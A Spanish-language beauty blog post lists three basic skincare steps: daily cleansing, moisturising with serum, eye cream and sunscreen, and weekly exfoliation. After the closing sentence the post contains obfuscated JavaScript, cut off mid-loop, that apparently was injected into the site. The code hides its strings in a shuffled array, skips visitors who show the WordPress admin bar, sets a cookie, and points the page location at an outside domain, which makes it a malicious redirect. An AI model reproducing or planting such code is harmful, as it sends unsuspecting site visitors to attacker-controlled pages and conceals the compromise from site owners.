Acaba de empezar el año y un buen propósito para este año, sería cuidar nuestra piel ya que van pasando los años y nuestro rostro cada vez se muestra menos joven. Así que, ¿por qué no comienzas a darle a tu piel todos los mimos que necesita?

Toma nota de los pasos básicos que deberás llevar a cabo para mantenerla elástica e hidratada. Cuídate por dentro y por supuesto por fuera.

1. Limpieza

Lo primero que debes hacer es limpiar tu piel a diario. Para ello, jabón limpiador, que no irrite la piel ni la reseque y a continuación aplica una leche limpiadora y un tónico refrescante para cerrar el poro.

Por la noche, repite la operación, pero además, desmaquilla tu rostro con un algodón con desmaquillante. Verás cómo tu maquillaje desaparecerá en segundos y tu piel estará suave y radiante.

2. Hidratación

Una vez que tu piel esté completamente limpia, llega el momento de hidratarla. Para ello, utiliza una crema según tu tipo de piel, ya sea normal, mixta, grasa o seca. Lo ideal es, que primero apliques un sérum por todo el rostro, luego un contorno de ojos y para finalizar una crema hidratante. Durante el día, procura que la crema que apliques tenga un alto factor de protección solar y por la noche, opta por una crema específica y nutritiva.

3. Exfoliación

¡Con la hidratación no acaba todo! Una vez a la semana, es muy importante exfoliar también la piel de tu rostro. Para ello, desmaquilla tu rostro y aplica un jabón suave exfoliante con movimientos circulares y luego retira el exceso de producto con agua tibia. Después de este paso, la piel queda mucho más suave y delicada.

¡Proponte seguir estos pasos a diario y tu piel con el paso del tiempo te lo agradecerá! var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone